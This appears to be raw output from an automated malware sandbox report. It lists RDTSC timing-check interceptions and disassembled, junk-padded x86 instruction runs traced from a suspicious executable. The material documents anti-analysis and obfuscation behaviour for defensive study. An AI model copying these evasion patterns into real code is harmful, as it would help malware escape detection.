Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541039D second address: 54103A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54103A3 second address: 54103B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54103B4 second address: 54103D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C9098CF8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F058A second address: 53F058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F058E second address: 53F060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d pushfd 0x0000000e jmp 00007F43C9098CF1h 0x00000013 and al, 00000056h 0x00000016 jmp 00007F43C9098CF1h 0x0000001b popfd 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F43C9098CF3h 0x00000026 pushfd 0x00000027 jmp 00007F43C9098CF8h 0x0000002c jmp 00007F43C9098CF5h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5400ED5 second address: 5400F1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F43C8AE0084h 0x00000010 jmp 00007F43C8AE0082h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d mov ebx, 71E21A1Eh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5400F1A second address: 5400F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, C2F7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43C9098CF9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5400F42 second address: 5400F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430669 second address: 543066D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 543066D second address: 5430671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430671 second address: 5430677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430677 second address: 543067D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 543067D second address: 54306CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F43C9098CF0h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F43C9098CF3h 0x00000019 and cx, 900Eh 0x0000001e jmp 00007F43C9098CF9h 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54306CE second address: 543071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F43C8AE007Ch 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F43C8AE007Ch 0x00000015 sbb ecx, 3828C9B8h 0x0000001b jmp 00007F43C8AE007Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ecx 0x00000023 pushad 0x00000024 pushad 0x00000025 mov edi, ecx 0x00000027 call 00007F43C8AE007Eh 0x0000002c pop esi 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 543071B second address: 543072E instructions: 0x00000000 rdtsc 0x00000002 mov al, BFh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [774365FCh] 0x0000000c pushad 0x0000000d mov ax, di 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 543072E second address: 543073C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 test eax, eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 543073C second address: 5430740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430740 second address: 5430752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430752 second address: 5430758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430758 second address: 543075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 543075C second address: 5430770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F443B01BEE8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430770 second address: 5430774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430774 second address: 543077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 543077A second address: 54307DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007F43C8AE007Eh 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 mov ax, bx 0x00000017 mov eax, edx 0x00000019 popad 0x0000001a and ecx, 1Fh 0x0000001d jmp 00007F43C8AE0085h 0x00000022 ror eax, cl 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F43C8AE0088h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54307DB second address: 54307E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54307E1 second address: 543084E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F43C8AE007Eh 0x00000011 xor ax, 5258h 0x00000016 jmp 00007F43C8AE007Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F43C8AE0088h 0x00000022 or ah, FFFFFFB8h 0x00000025 jmp 00007F43C8AE007Bh 0x0000002a popfd 0x0000002b popad 0x0000002c retn 0004h 0x0000002f nop 0x00000030 mov esi, eax 0x00000032 lea eax, dword ptr [ebp-08h] 0x00000035 xor esi, dword ptr [00C42014h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push eax 0x0000003e lea eax, dword ptr [ebp-10h] 0x00000041 push eax 0x00000042 call 00007F43CD3107F7h 0x00000047 push FFFFFFFEh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov bx, 20A6h 0x00000050 mov cx, bx 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 543084E second address: 54308C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43C9098CF6h 0x00000008 pop esi 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F43C9098CF8h 0x00000017 sub ax, B8A8h 0x0000001c jmp 00007F43C9098CEBh 0x00000021 popfd 0x00000022 push eax 0x00000023 mov dx, 6B4Ah 0x00000027 pop edi 0x00000028 popad 0x00000029 ret 0x0000002a nop 0x0000002b push eax 0x0000002c call 00007F43CD8C94C1h 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 pushad 0x00000035 mov edi, 2303191Ch 0x0000003a popad 0x0000003b mov si, di 0x0000003e popad 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F43C9098CF3h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54308C6 second address: 54308EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov al, bh 0x00000011 push ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E00A5 second address: 53E00AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E00AB second address: 53E00AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E00AF second address: 53E0150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F43C9098CEEh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 jmp 00007F43C9098CEEh 0x00000018 mov ax, 2641h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F43C9098CEDh 0x00000025 adc si, 7696h 0x0000002a jmp 00007F43C9098CF1h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F43C9098CF0h 0x00000036 or cx, F6B8h 0x0000003b jmp 00007F43C9098CEBh 0x00000040 popfd 0x00000041 popad 0x00000042 xchg eax, ebx 0x00000043 jmp 00007F43C9098CF6h 0x00000048 mov ebx, dword ptr [ebp+10h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0150 second address: 53E0156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0156 second address: 53E0190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F43C9098CF0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43C9098CEEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0190 second address: 53E0196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0196 second address: 53E01ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov ecx, edi 0x0000000c pushfd 0x0000000d jmp 00007F43C9098CEBh 0x00000012 sub si, 589Eh 0x00000017 jmp 00007F43C9098CF9h 0x0000001c popfd 0x0000001d popad 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F43C9098CF8h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E01ED second address: 53E01FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E01FC second address: 53E0202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0202 second address: 53E024F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F43C8AE007Ch 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F43C8AE007Eh 0x00000018 and si, FF58h 0x0000001d jmp 00007F43C8AE007Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 mov esi, 36AE4EA5h 0x00000029 popad 0x0000002a popad 0x0000002b test esi, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov cx, 56FFh 0x00000034 push eax 0x00000035 pop ebx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E024F second address: 53E02BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C9098CF7h 0x00000009 xor esi, 5AABF37Eh 0x0000000f jmp 00007F43C9098CF9h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F443B06706Ch 0x00000020 jmp 00007F43C9098CEAh 0x00000025 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002c pushad 0x0000002d mov si, 698Dh 0x00000031 mov di, si 0x00000034 popad 0x00000035 je 00007F443B067062h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E02BB second address: 53E02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E02BF second address: 53E02C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E02C5 second address: 53E0350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C8AE0086h 0x00000009 jmp 00007F43C8AE0085h 0x0000000e popfd 0x0000000f mov ah, DEh 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 mov dx, F27Ch 0x0000001c pushfd 0x0000001d jmp 00007F43C8AE0085h 0x00000022 or ecx, 1E9399D6h 0x00000028 jmp 00007F43C8AE0081h 0x0000002d popfd 0x0000002e popad 0x0000002f or edx, dword ptr [ebp+0Ch] 0x00000032 jmp 00007F43C8AE007Eh 0x00000037 test edx, 61000000h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 mov eax, 716862D3h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0350 second address: 53E035D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 224C592Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov edx, ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E035D second address: 53E03C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F443AAAE39Ch 0x0000000b pushad 0x0000000c jmp 00007F43C8AE0085h 0x00000011 popad 0x00000012 test byte ptr [esi+48h], 00000001h 0x00000016 jmp 00007F43C8AE007Eh 0x0000001b jne 00007F443AAAE386h 0x00000021 pushad 0x00000022 mov cl, 2Eh 0x00000024 pushad 0x00000025 mov ebx, 02C9C3FCh 0x0000002a jmp 00007F43C8AE0085h 0x0000002f popad 0x00000030 popad 0x00000031 test bl, 00000007h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F43C8AE007Dh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E03C9 second address: 53E03D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E03D9 second address: 53E03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0768 second address: 53D0785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F43C9098CEDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0785 second address: 53D0789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0789 second address: 53D078F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D078F second address: 53D07E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C8AE0080h 0x00000009 jmp 00007F43C8AE0085h 0x0000000e popfd 0x0000000f jmp 00007F43C8AE0080h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 and esp, FFFFFFF8h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F43C8AE0087h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D07E8 second address: 53D0800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0800 second address: 53D0839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F43C8AE0086h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F43C8AE007Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0839 second address: 53D083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D083F second address: 53D0868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F43C8AE0089h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0868 second address: 53D087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D087B second address: 53D0893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0893 second address: 53D08E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F43C9098CEFh 0x00000012 mov ah, 26h 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 jmp 00007F43C9098CEBh 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e jmp 00007F43C9098CF6h 0x00000023 sub ebx, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D08E5 second address: 53D08E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D08E9 second address: 53D08EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D08EF second address: 53D09B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43C8AE007Bh 0x00000008 call 00007F43C8AE0088h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 test esi, esi 0x00000013 jmp 00007F43C8AE0081h 0x00000018 je 00007F443AAB5AD8h 0x0000001e jmp 00007F43C8AE007Eh 0x00000023 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002a pushad 0x0000002b mov bx, cx 0x0000002e mov dh, ch 0x00000030 popad 0x00000031 mov ecx, esi 0x00000033 jmp 00007F43C8AE0085h 0x00000038 je 00007F443AAB5AB4h 0x0000003e pushad 0x0000003f movzx ecx, dx 0x00000042 pushfd 0x00000043 jmp 00007F43C8AE0089h 0x00000048 or ah, FFFFFFF6h 0x0000004b jmp 00007F43C8AE0081h 0x00000050 popfd 0x00000051 popad 0x00000052 test byte ptr [77436968h], 00000002h 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F43C8AE007Dh 0x00000060 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D09B5 second address: 53D0A2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43C9098CF7h 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F443B06E6C7h 0x00000014 pushad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007F43C9098CF5h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F43C9098CF9h 0x0000002c or ecx, 3FBB7C76h 0x00000032 jmp 00007F43C9098CF1h 0x00000037 popfd 0x00000038 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0A2F second address: 53D0B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F43C8AE0083h 0x0000000e jmp 00007F43C8AE0088h 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 jmp 00007F43C8AE0080h 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F43C8AE0080h 0x00000020 push eax 0x00000021 jmp 00007F43C8AE007Bh 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F43C8AE0084h 0x0000002e xor cx, D0B8h 0x00000033 jmp 00007F43C8AE007Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F43C8AE0088h 0x0000003f and cl, 00000018h 0x00000042 jmp 00007F43C8AE007Bh 0x00000047 popfd 0x00000048 popad 0x00000049 push dword ptr [ebp+14h] 0x0000004c jmp 00007F43C8AE0086h 0x00000051 push dword ptr [ebp+10h] 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 mov eax, 57F51653h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0B59 second address: 53D0B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, al 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0B60 second address: 53D0B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0087h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0B7B second address: 53D0B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43C9098CF0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0B96 second address: 53D0BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Eh 0x00000009 rdtsc
